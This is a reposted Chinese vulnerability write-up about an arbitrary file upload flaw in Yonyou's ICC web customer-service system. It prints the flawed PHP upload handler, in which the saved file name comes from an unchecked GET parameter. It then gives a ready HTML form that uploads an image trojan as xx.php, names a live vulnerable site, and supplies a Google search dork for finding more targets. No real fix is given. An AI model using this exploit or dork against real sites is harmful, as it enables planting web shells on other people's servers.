网站地图    收藏   

主页 > 后端 > 网站安全 >

再暴用友ICC网站客服系统任意文件上传漏洞 - 网

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] 再暴用友ICC网站客服系统任意文件上传漏洞,看了一下上一个漏洞:http://www.2cto.com/Article/201204/127159.html,发现还存在其它的上传漏洞。不知是不是还没升级完成或是什么问题,但测试多...

再暴用友ICC网站客服系统任意文件上传漏洞,看了一下上一个漏洞:http://www.2cto.com/Article/201204/127159.html,发现还存在其它的上传漏洞。
不知是不是还没升级完成或是什么问题,但测试多个网站均存在漏洞。
 
/home/ecccs/web/5107/upload/screenImagesSave.php(相关上传的也同样有)
 
 
<?php
/**
 * screenImagesSave.php
 *
 */
require_once('../global.inc.php');
 
//get request.
$ft = intval($_REQUEST['ft']);
 
/*
chdir($CONFIG["canned_file_tmp"]);
exec("rm -rf *");
*/
 
$date = date("Ymd");
$dest = $CONFIG->basePath.'data/files/'.$date."/";
if (!is_dir($dest))    mkdir($dest, 0777);
 
$filename = paramsFmt(urldecode($_GET["filename"]));
 
$nameExt = strtolower($COMMON->getFileExtName($_FILES['file']['name']));
 
$unallowedType = array('php', 'jsp', 'asp', 'sh', 'pl', 'js', 'jar', 'jad', 'class', 'java');
if(in_array($nameExt, $unallowedType)){
       if($ft == '1'){
              echo 'pe';
       }else if($ft == '2'){
              echo 'fe';
       }    
       exit;
}
 
/* www.2cto.com
if (empty($filename)) $filename = date("Ymdhms")."_noname.file";
echo $date."/".$filename;
*/
 
$filenameNew = $dest.$filename;
 
if(empty($_FILES["file"]['error'])){
       move_uploaded_file($_FILES["file"]["tmp_name"],$filenameNew);
}
 
if(file_exists($filenameNew)){
       echo(urlencode($CONFIG->baseUrl.'data/files/'.$date."/".$filename));
       @chmod($filenameNew, 0444);
}else{
       if($ft == '1'){
              echo 'pe';
       }else if($ft == '2'){
              echo 'fe';
       }
}
?>
 
 
注意到filename 没有?有验证上传文件的类型,但保存的文件名却为:filename GET的参数。晕了。。
 
<form id="QuickSearch" name="QuickSearch" enctype="multipart/form-data" method="post" action="http://xxx.xxxx.com/5107/upload/screenImagesSave.php?filename=xx.php">
<input type="file" name="file">
<input type="submit" name="QuickSearchBtn" value="上传">
</form>
 
上传一个jpg 的图片木马,即上传成功为xx.php的马。
测试了:
http://icc.5107.cn/
和Google搜索的
等都存在。
 
查找:
https://www.google.com/search?q=inurl:/5107/upload/upload.php&hl=en&noj=1&prmd=imvns&ei=E12mT4ugCcKjiQf7ofnHAw&start=10&sa=N&filter=0&biw=1366&bih=618

 
 
修复方案:

应该懂得!



作者:Jannock

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论